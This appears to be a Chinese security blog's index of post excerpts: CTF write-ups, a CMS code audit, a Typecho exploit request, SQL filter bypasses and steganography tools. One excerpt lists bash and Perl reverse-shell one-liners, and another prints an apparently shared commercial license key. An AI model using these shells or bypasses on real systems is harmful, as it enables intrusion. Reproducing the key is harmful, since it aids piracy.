前段时间看了一个比赛，题目应该算是比较旧的了 <?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>50){ die("Long."); } $a = preg_match("/[A-Za-z0-9_]+/",$code); print_r($a); ...

阅读全文>>

sinsiu PHP 1.0 final 不多说，先上了Seay源代码审计系统，查看了一些东西 然后跟了一下，在admin/module/file/deal.php 第69~71行这里发现没有对数据以及文件名进行任何过滤 跟进post函数，位置为include/function.php 第198~201行，从上一步获取两个参数，第二个参数没有使用默认的strict，而是no_filter function post($val,$filter = 'strict') { return $filter(isset($_POS...

阅读全文>>

0x01 EASYWEB 前面做题的时候一直发现这个题不能注入，后来在登录页面随手试了admin和空口令登录，抓包发现会自动填充密码，把密码去掉拿到flag。 0x02 验证码 刚开始放出这个题目的时候是点击图片的验证码，随手点了几个等成绩刷新便拿到了flag。在放出验证码2后发现，这个题目竟然改过了。最终的flag： 0x03 picture 1.首先得到一张jpg图片，丢到binwalk里看到隐藏数据，直接使用-e参数解压出来下面的base64： S1ADBBQAAQAAADkwl0xs4x98...

阅读全文>>

0x00 77777 "77777" is my girlfriend's nickname，have fun xdd:) hk node:47.75.14.48 cn node:47.97.168.223 (Two challenge servers are identical, use either of them.) 做题时被burpsuite坑了好久，一直POST不过去数据，之后用hackbar搞定。 直接在首页post两个参数flag和hi，可以看到profil...

阅读全文>>

Bash版： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Perl版： perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("...

阅读全文>>

0x00 前言 听说了这个洞，吓得赶紧去看了一下自己的博客，发现自己当初安装完就把这个文件和install目录删了，看来当初自己安全意识还是可以滴 233 0x01 Payload GET /typecho/install.php?finish=1 HTTP/1.1 Host: 192.168.211.169 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/x...

阅读全文>>

过滤关键字   and or php代码   preg_match('/(and|or)/i',$id) 会过滤的攻击代码    1 or 1=1 1 and 1=1 绕过方式    1 || 1=1 1 && 1=1 过滤关键字   and or union php代码   preg_match('/(and|or|union)/i',$id) 会过滤的攻...

阅读全文>>

微软最近正式发布了.NET Core 1.0、它支持Windows、OS X和Linux三种操作系统。其中.NET Core最受瞩目，这是一款跨平台、开源且模块化的.NET平台，可以用来搭建web应用、微服务、创立应用库和控制台应用。 .NET Core的组成： .NET runtime：提供运行环境，汇编码加载，垃圾回收等基础服务。 框架库：完全整合传统的.NET标准库。提供基础数据类型和不同类型应用的基础组件等。 .NET Core SDK：相关系列的SDK工具和语言编译器 .NET Core应用的命令行...

阅读全文>>

1、常见的基本隐写 binwalk : kali自带的图片分析以及提取,很强大的作用 进入到kali改图片目录下，运行命令 binwalk sim.jpg 可以很清晰的看到图片中隐藏着一个压缩包，继续运行命令 binwalk -e sim.jpg,可以将里面的压缩包提取出来。其实提取的方式有好几种，可以使用winhex、foremost等进行提取。 foremost : 也是kali自带的一款，它不仅仅局限于图片一种模式，还可以提取流量包等等，当binwalk无法提取时，不妨试试它 Stegsolve ...

阅读全文>>

—– BEGIN LICENSE —– Michael Barnes Single User License EA7E-821385 8A353C41 872A0D5C DF9B2950 AFF6F667 C458EA6D 8EA3C286 98D1D650 131A97AB AA919AEC EF20E143 B361B1E7 4C8B7F04 B085E65E 2F5F5360 8489D422 FB8FC1AA 93F6323C FD7F7544 3F39C318 D95E6480 FCCC7561 8A4A1741 68FA4223 ADCEDE07 200C25B...

阅读全文>>